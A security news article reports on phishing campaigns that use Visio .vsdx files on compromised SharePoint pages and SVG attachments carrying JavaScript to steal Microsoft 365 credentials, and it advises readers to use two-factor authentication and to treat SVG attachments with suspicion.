Update, Nov. 18, 2024: This story, originally published Nov. 17 now includes a new report of another tactic increasingly being used by threat actors in phishing cyber attacks.
Just as security professionals will tell you that layered defensive strategies are the best when it comes to staving off successful attacks, so attackers will often look to precisely the same when executing their cyber attacks. Two-step phishing attacks have, in the words of security researchers from Perception Point, “become a cornerstone of modern cybercrime,” leveraging trusted platforms “to deliver malicious content in layers to evade detection.” Everything changes, but everything stays the same. Those same researchers have warned of a new attack methodology employing such 2SP tactics but involving Microsoft Visio files as a new evasion tactic. Here’s what you need to look out for and what steps you can take to mitigate the risk of falling victim to these new 2SP cyber attacks.
Two-Step Cyber Attacks Are The Pinnacle Of Phishing By Design
A new analysis published by Peleg Cabra, the product marketing manager at Perception Point, has revealed how security researchers working for the vendor have found threat actors increasingly turning to the use of Microsoft Visio .vsdx format files to evade detection during credential stealing cyber attacks.
Because Visio is a commonly used tool employed in the workplace to help visualize complex data or workflows, the use of .vsdx format files fits nicely into the threat actor strategy of “harmless familiarity” being at the heart of many a phishing attack. Now, the Perception Point researchers said, the exact same files are being weaponized in the delivery of malicious URLs as part of a two-step phishing attack scenario: drop the lure, set the trap.
Describing what they referred to as a “dramatic increase in two-step phishing attacks leveraging .vsdx files,” the security researchers explained how the cyber attacks represented “a sophistication of two-step phishing tactics, targeting hundreds of organizations worldwide with a new layer of deception designed to evade detection and exploit user trust.”
Evolution Of The Two-Step Phishing Cyber Attacks
If such a warning were necessary, here it comes: email account security is vital if cyber attacks such as these latest two-step phishing ones are to be stopped. Why so? Because, the researchers said, they started with threat actors leveraging breached email accounts in order to send emails that pass basic authentication checks as they come from genuine domains.
These emails will contain a common phishing component designed to lure the recipient into the trap: a business proposal or a purchase order, accompanied by an urgent request to view and respond to. Of course, when the victim does just that, and click the URL, they get led to the trap itself: an often-compromised Microsoft SharePoint page itself, but whatever one that is hosting a .vsdx Viso file. The layers of the cyber attack start unraveling at this point, with another URL embedded in that file and behind what the researchers described as a clickable call-to-action, most commonly a “view document” button.
Please Hold Down The Ctrl Key Is An Instruction In These Newly Uncovered 2SP Cyber Attacks
This is where these 2SP cyber attacks get really clever, although I hate applying that word to cybercriminals. “To access the embedded URL, victims are instructed to hold down the Ctrl key and click,” the Perception Point researchers said, “a subtle yet highly effective action designed to evade email security scanners and automated detection tools.” By asking for this human interaction, the attackers hope to bypass automated systems that don’t expect such a behavior in an attack.
The victim is now redirected to another fake page, this time one that looks for all intents and purposes to be a Microsoft 365 portal login page which is designed, of course, to steal user credentials. There is no mention in the Perception Point report of this step including a session cookie compromise tactic, which means that one way to stop it from being successful would be to have robust two-factor authentication in place for the account that is being targeted in such cyber attacks.
Scalable Vector Graphics Are Deployed In New Cyber Attacks—Here’s How
A new report by Lawrence Abrams, the editor-in-chief at Bleeping Computer, threat actors are increasingly using another clever tactic involving the use of scalable vector graphics as attachments during the deployment of phishing cyber attacks. This technique is designed to either display malicious forms to the victim, or deploy malware directly, both while evading detection by security software. The tactic relies on the fact that unlike pixel-constructed images, scalable vector graphics are created using a mathematical formula that instructs how lines, shapes and text should be displayed on the screen. Security researcher MalwareHunterTeam, told Bleeping Computer how threat actors are using the fact that SVG attachments can display HTML and execute JavaScript when the image itself is being loaded. The clever bit is that these are used to create credential-stealing forms. Abrams demonstrated how such a technique could display an Excel spreadsheet that comes complete with an embedded login form to send credentials to the threat actor deploying the cyber attacks. It has been noted, however, that other cyber attacks employ JavaScript embedded within the SVG attachments to redirect browsers to sites hosted by the threat actors when opening the image itself.
Mitigating SVG Attachment Cyber Attacks
“The problem is that since these files are mostly just textual representations of images,” Abrams said, “they tend not to be detected by security software that often.” This means that the last line of defense is the same as the first: you, the human being. Ask yourself why you would be getting an attachment in scalable vector graphics format in the first place, if these are not commonplace within your workflow. If you are a developer or someone else who is used to seeing SVG attachments, then ask yourself who is sending them and whether this is normal behavior for them. Treat all emails that come with an SVG attachment as suspicious, and that way, you might just save yourself and your organization from falling victim to these phishing cyber attacks.